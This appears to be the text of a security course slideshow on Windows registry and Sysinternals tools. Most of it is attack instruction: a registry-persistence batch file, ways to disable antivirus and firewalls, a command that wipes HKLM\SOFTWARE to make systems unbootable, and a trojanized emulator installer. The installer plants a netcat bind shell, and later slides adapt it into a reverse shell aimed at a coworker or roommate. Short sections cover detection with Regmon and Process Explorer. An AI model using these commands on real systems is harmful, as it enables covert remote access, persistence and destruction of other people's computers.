550 likes | 672 Views
System Monitoring with Sys-Internals. http://www.sys-internals.com. Section 1: Registry Manipulation and Having Evil fun. Registry - Part of windows containing program info. - System settings stored in registry - Replaced old startup systems (Autoexec.bat, ini files)
E N D
System Monitoring with Sys-Internals http://www.sys-internals.com
Section 1: Registry Manipulation and Having Evil fun. • Registry - Part of windows containing program info. - System settings stored in registry - Replaced old startup systems (Autoexec.bat, ini files) - Essential to Windows operation • Structure - registry divided into hives - like a folder hierarchy - keys located in lower levels of hives
Parts of the Regisry • HKEY_CURRENT_USER - information and profile of current user • HKEY_USERS - user profiles • HKEY_LOCAL_MACHINE - configuration information particular to the computer • HKEY_CLASSES_ROOT - subclass of LOCAL_MACHINE: stores program information • HKEY_CURRENT_CONFIG - hardware profiles
Software • Regedit - Built into windows - GUI registry modifyer • Regmon - Sys-internal that will monitors all registry accesses and activities. - Has filtering capabilities - Will be used to detect malicious keys and their function • Batch Files - Can combine commands into simple program • Jetico Firewall - For simple key demonstration
Structure of a Key • Name | Type | Data • Appears like this in Regedit
Modifying Keys 1) Adding a key: REG ADD RegistryPath /V Name /d Data 2) Modifying an existing key: REG UPDATE RegistryPath /V Name /d Data 3) Deleting a key: REG DELETE RegistryPath [/FORCE]
Lab Situation • Virus gets installed on a system • User deletes the virus, but on restart virus comes back • One way a hacker can do this is via the registry • The following key location contains startup program information: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Re-installation Batch File: Infect.bat • Infect.bat and virus on system in hidden folder. • Infect.bat copies virus to Windows, renames it to MrMalicious, and runs it. • User sees virus in task manager, searches hard drive and deletes MrMalicious, thinking he or she is da bomb.
Uh-Oh • Infect.bat re-infects the system on startup because of startup registry key. • Hidden viral file is still on system. • MrMalicious comes back • User is not da bomb Note: MrMalicious for this lab just takes up CPU time and runs in the background.
Viral Code reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Process /d "C:\WINDOWS\HiddenFolder\Infect.bat" MD "C:\WINDOWS\HiddenFolder\" copy Infect.bat "C:\WINDOWS\HiddenFolder\" copy RenameMe.exe "C:\WINDOWS\HiddenFolder\" copy RenameMe.exe "C:\Windows\HiddenFolder\" cd "C:\Windows" Ren RenameMe.exe "MrMalicious.exe" Start MrMalicious.exe exit
Turning off Antivirus/Firewalls • Before going over detection, we will examine how to turn off important anti-viral programs. • Wouldn’t it be nice not to have to deal with a victim’s firewall?
Removal of Startup programs • Simple Process • Delete all startup keys manually on hacker system • Backup key folder by exporting • Have virus replace startup folder with empty backup. • Running registry backups (.reg) will replace keys in the current location • Could also use query command in software to remove all keys with string “norton” or “zonealarm” in specified hive
Detection • Regmon: GUI based registry logger • Lots of registry accesses/second on windows system • Typical program install requires 150,000 registry accesses. • How can we find malicious keys with so many reads/writes to registry?
Filtering Cont’d • User can filter out normal processes such as Explorer.exe, svchost, etc. • Logged entries can be cut down to just a few hundred. • Now easier to find where malicious keys have been added.
Evil Fun Time: Disable OS • Registry is key to operation of windows • Unfortunately, can be easily modified to make windows unstable and unbootable • Easy way to make enemies
Not fun for victim machine “REG DELETE HKEY_LOCAL_MACHINE\SOFTWARE /FORCE” =
Recovery from Reg deletion • System not bootable even in safe mode after previous line of code is run!!! • In order to recover normal program operation, must have a backup copy of whole registry • Without backup copy, all programs not included on Windows installation CD must be re-installed • Advice: Start backing up your registry • Erunt is software that can back up and re-insert the whole registry easily http://www.snapfiles.com/download/dlerunt.html
Poking holes in the Firewall from the command line • netsh firewall show portopening
Poking holes in the Firewall from the command line cont. • What happens when we try to use Netcat to listen on a closed port?
Poking holes in the Firewall from the command line cont. • If set to not allow exceptions, reset the firewall to default– C:\netsh firewall reset • Firewall default allows exceptions • After exceptions are allowed, add desired exception • C:\netsh firewall add portopening protocol = ALL port = 8633 name = nc mode = ENABLE scope = ALL profile = ALL
Hypothetical Scenario let us pretend we are a hacker with not so pleasant intentions operating from a RedHat 7.2 machine. The Windows XP machine is being operated by either a Co-worker, schoolmate, roommate, or anyone you can think of that would be found on the same network as you (i.e. no router is separating you).
Hypothetical Scenario cont. Suppose we give our friend the Windows XP user, a self extracting Zip program that installs the ZSNES Super Nintendo Emulator. Unfortunatley for the Windows XP user, we have also made it so this self extracting zip installs netcat, and runs a c program we wrote named installer.exe.
How the 8633 Exploit works • 9 system calls • The first system call moves an .exe called process to c:\Windows\system32 • The second call executes process – k nc.exe, this process kills all instances of Netcat in case the exploit has already been run on this machine so as not to cause an error
How the 8633 Exploit works cont. • The third call moves nc.exe to C:\Windows\system32, nc.exe is Netcat! • The fourth call moves server.exe to C:\Windows\system32 • The fifth call resets the Windows firewall in case it is set to not allow any exceptions, c:\netsh firewall reset
How the 8633 Exploit works cont. • The sixth system call is “C:\netsh firewall add portopening protocol = ALL port = 8633 name = nc mode = ENABLE scope = ALL profile = ALL” , which opens up the firewall on port 8633 for Netcat. • The seventh system call, “reg add hklm\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d c:\windows\system32\server.exe /f”, adds a key to the registry allowing server.exe to run whenever the computer is booted.
Changing the Registry to run a program when starting Windows • The Windows XP registry has six registry keys designated for launching programs when starting up the computer. They are: • HKCU\Software\Microsoft\Windows\CurrentVersion\Run - Launches program when specific user logs in • HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce - Launches program when specific user logs in next time, then is removed from the registry • HKLM\Software\Microsoft\Windows\CurrentVersion\Run - Launches program automatically at system startup * (key modified by installer.c) • HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce - Launches program automatically at system startup on next startup, then is Removed from the registry. • HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices - Launches service automatically at system startup (e.g. AIM) • HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce - Launches service automatically at system startup on next startup, then is - Removed from the registry.
How the 8633 Exploit works cont. • The Eighth system call runs Netcat. Because Netcat is run by nc.exe executable, it is difficult to run so the command prompt will close - system("start /d \"c:\\windows\\system32\\\" nc -L -p 8633 -e cmd.exe -d"); • The Ninth system call is just an exit command needed to close a second instance of the cmd shell.
What server.exe does and what Netcat is doing • Server.exe was added to the registry to run every time the system boots by installer.exe. Everytime the system is restarted, Netcat runs listening on the port 8633 and shells to cmd.exe when it is connected to by netcat from another machine. • Netcat is run with the –L and –d options so that it runs in silent mode, and opens itself back up in listening mode when disconnected. • C:\nc -L –p 8633 –e cmd.exe -d
Going back to the Hypothetical scenario Thinking he is in for an exciting afternoon of playing Super Mario World, and possibly even a little Ogre Battle, the unsuspecting Windows XP user is more than happy to take and install the emulator you give him. After he installs it, you have administrative access to his machine, for as long is you are on the same network with him (assuming he is not extremely knowledgeable of his Registry, or Firewall, or doesn’t decide to format his hard drive).
How to access Our friend the Windows XP users computer Since Netcat is listening on his computer when ever the computer is on, with the command C:\nc –L –p 8633 –e cmd.exe – d All we have to do is run nc x.x.x.x 8633, where x.x.x.x is his i.p adress and we have access.
Why Port 8633 • Because Spelling out TODD numerically on cell phones etc, is done by 8-6-3-3 • TODD is my name, and I came up with this paticular exploit, and I had to pick a port so why not 8633
A new Scenario Suppose we want to gain access to our friend the Windows XP user’s computer (Who by the way is probably not our friend, otherwise we wouldn’t be continuously hacking his computer), and this time he is not on the same network as we are.
A new Scenario cont. In order to do this, we will edit our code slightly from the previous exploit. Rather than having the Windows user in listening mode, we will put our Linux machine in listen mode and have his machine seek out a connection with us. In both server.c, and installer.c we will change “c:\nc –L –p 8633 –e cmd.exe –d” to “c:\nc “our_i.p.” 80 –e cmd.exe –d”
A new Scenario cont. • Make sure our router is set to forward the traffic coming into port 80 to our machine. • Then we initialize our machine in listen mode, with the command: #nc –vv –l –p 80 • Then we wait
One final example • Running commands from one port and recieveing on another • We can use Netcat to send commands through the cmd.exe shell, takeing commands in from one port and sending them out another
One final example cont. • Setting up two listening ports on your machine • nc –vv –l –p 80 • nc –vv –l –p 25 • Then on the Windows machine run “nc x.x.x.x 80 | cmd.exe | nc x.x.x.x 25” where x.x.x.x is your ip adress. • This allows you to run commands from port 80 and receive the results from port 25
Section 4: Unleashing a Wild Boar • Active Monitoring Tools • Process Explorer • Activity Logging • Registry Monitoring • File Monitoring • Network Monitoring • Stack Call • Logging Traffic
Process Explorer • Process Explorer • Show CPU/Memory usage • Show active network ports • Show process threads
Ethereal • Logs network traffic • Become familiar with extracting TCP flows